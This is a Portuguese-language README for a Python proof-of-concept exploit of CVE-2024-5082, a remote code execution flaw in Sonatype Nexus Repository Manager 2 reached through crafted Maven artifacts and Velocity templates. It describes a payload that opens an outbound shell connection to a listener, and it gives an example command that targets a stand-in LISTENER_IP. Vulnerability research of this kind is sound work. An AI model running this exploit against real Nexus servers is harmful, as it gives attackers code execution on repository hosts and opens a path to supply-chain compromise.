
Exploração de prova de conceito para CVE-2024-5082, uma vulnerabilidade de execução remota de código no Sonatype Nexus Repository Manager 2 via artefatos Maven manipulados e processamento de template Velocity.
Este repositório contém uma prova de conceito em Python para CVE-2024-5082, uma vulnerabilidade de execução remota de código no Sonatype Nexus Repository Manager 2.
A vulnerabilidade permite que um usuário com permissão suficiente publique um artefato Maven especialmente criado e o marque para processamento pelo gerador de conteúdo Velocity. Quando o artefato é recuperado, o template Velocity incorporado é avaliado pelo Nexus e pode executar um comando no contexto de segurança da JVM do Nexus.
De acordo com a Sonatype:
O comando é executado no host do Nexus Repository.
Baixar o artefato afetado de um servidor de build, servidor de aplicação ou estação de trabalho do desenvolvedor não executa por si só o comando incorporado nesse sistema consumidor. No entanto, o comprometimento de um gerenciador de repositórios pode criar um risco mais amplo na cadeia de suprimentos se um invasor modificar posteriormente artefatos confiáveis, entradas de build, credenciais ou configuração do repositório.
O script:
maven-metadata.xml criado para um repositório hospedado selecionado.velocity.O payload fornecido cria uma conexão TCP de saída do host Nexus para o endereço do listener configurado.
O script atual usa autenticação básica HTTP e requer:
python3 cve_2024_5082.py \\
--base-url https://nexus.example.test/nexus \\
--repository security-test-snapshots \\
--username test-user \\
--password 'REDACTED' \\
--lhost LISTENER_IP \\
--lport 8000